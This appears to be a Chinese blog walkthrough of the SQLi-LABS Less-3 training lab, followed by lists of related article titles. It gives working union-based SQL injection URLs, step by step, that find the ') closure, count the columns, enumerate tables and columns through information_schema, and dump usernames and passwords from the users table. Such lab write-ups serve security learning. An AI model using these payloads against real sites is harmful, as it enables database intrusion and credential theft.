1、判断是否动、静态页面

http://localhost:9898/Less-3/?/id=2;可以判断参数是id，id值不一样，显示页面不同

2.判断是否存在注入

可用\号来查看构造闭合，分别用http://localhost:9898/Less-3/?id=1') and 1=1-- qwe和http://localhost:9898/Less-3/?id=1') and 1=2-- qwe来进行探测

可以看到')构成闭合。

3.判断字段数

用order by判断字段数（二分法）

http://localhost:9898/Less-3/?id=1') order by 4-- qwe

http://localhost:9898/Less-3/?id=1') order by 2-- qwe

http://localhost:9898/Less-3/?id=1') order by 3-- qwe

说明字符数为3

4.判断显错位

http://localhost:9898/Less-3/?id=999') union select 1,2,3-- qwe

结果显示回显点为2,3

5.判断库名和数据库版本

http://localhost:9898/Less-3/?id=999') union select 1,version(),database()-- qwe

结果可发现当前数据库是security数据库，数据库版本是5.0以上。

6.判断表名

http://localhost:9898/Less-3/?id=999') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- qwe

用group_concat输出security数据库下的所有表。

7.判断列名

http://localhost:9898/Less-3/?id=999') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'-- qwe

一般用户名和密码都在users表，所以爆users表。

8.寻找具体数据

?id=999') union select 1,group_concat(username),group_concat(password) from users-- qwe

从users表中获取敏感信息。

至此，回显注入完成。

SQLI-LABS Page 1 ——Less 03相关推荐

1. SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注

   第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...

2. SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注

   第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...

3. SQLi LABS Less 26a 联合注入+布尔盲注

   第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and  or ),注释(/*  #  --  /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...

4. SQLi LABS Less 25 联合注入+报错注入+布尔盲注

   第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...

5. sqli——labs初学者通关详

   目录 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) Less-2 GET-Error based- Intiger bas ...

6. SQLi LABS Less-8 布尔盲注

   「作者主页」:士别三日wyx 「作者简介」:CSDN top200.阿里云博客专家.华为云享专家.网络安全领域优质创作者 第八关是单引号字符型注入,推荐使用布尔盲注 方式一:布尔盲注 第一步.判断注入 ...

7. SQLi LABS Less-31

   第31关的源码中并未对参数做过多的过滤,只是在参数两边拼接了双引号和括号 在url地址栏中输入 1") and true-- a,使SQL恒成立,页面正常显示 再输入 1") an ...

8. SQLi LABS Less-30

   第30关使用GET请求传递参数,在url中构造payload即可 后端源码中并没有做什么过滤,只是在参数两边添加了双引号 输入 1" and true-- a,页面正常显示 输入 1&quo ...

9. SQLi LABS Less-29

   第29关使用GET请求提交参数,在url中构造payload即可 源码中并没有做什么过滤,直接测试注入点即可 在url中输入 1'and true-- a,源码中的SQL会拼接成下面这样 注释后面的内 ...

10. SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注

    第26关是单引号字符型注入: 后台过滤了关键字( and  or ),注释(/*  #  --  /),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 目录 一.功能分析 二 ...

最新文章

1. 计算机里面的百度云怎么弄消失,我换了个手机登录我的百度网盘，里面存的东西都不见了，谁能告诉我怎么弄回来么...
2. [MATLAB粒子模拟笔记]差分泊松方程求静电场分布
3. SpringBoot shedlock MongoDb锁配置
4. Linux下快速搭建DNS服务器
5. 【MySQL】MySQL基础理论学习笔记
6. c++开发软件_Windows下学习C语言有哪些集成开发软件？
7. 2022美赛LSTM
8. 《Java开发实战经典》PDF+随书视频
9. 中国天气网城市代码Json数据
10. Supermap的基本概念
11. cc联盟网-中国最佳电子商务托管平台
12. 王牌竞速安装后显示服务器维护,王牌竞速怎么修车 王牌竞速怎么维修车 王牌竞速的车怎么维护...
13. 安卓Launcher 简介
14. 2048【浙江工商大学oj】
15. Android设备硬件序列号（SN、串号）分析
16. JavaEE学习日志(七十三): 黑马商城项目（六）
17. hanlp中文语言处理--词典加载源码过程分析及自定义用户词汇添加
18. sai椭圆尺子等比例放大或者缩小
19. 深度强化学习（DRL）一：入门篇
20. 深度学习mask掩码机制

热门文章

1. ux pm_如何从学术研究人员过渡到UX研究人员
2. vue----devtools安装教程
3. Spring Web项目
4. 美团笔试题：股票交易日
5. MySQL 确定哪些是叶节点、分子节点、根节点
6. Android 简单生成二维码名片
7. 开源素材网_34个用于广告素材的开源工具
8. CubeFS存储技术揭密(1) — 纠删码引擎系统设计
9. 南加大计算机专业硕士申请,南加州大学计算机科学(计算机网络)理学硕士研究生申请要求及申请材料要求清单...
10. 企业APP联盟，抢占企业移动互联网时代营销制高点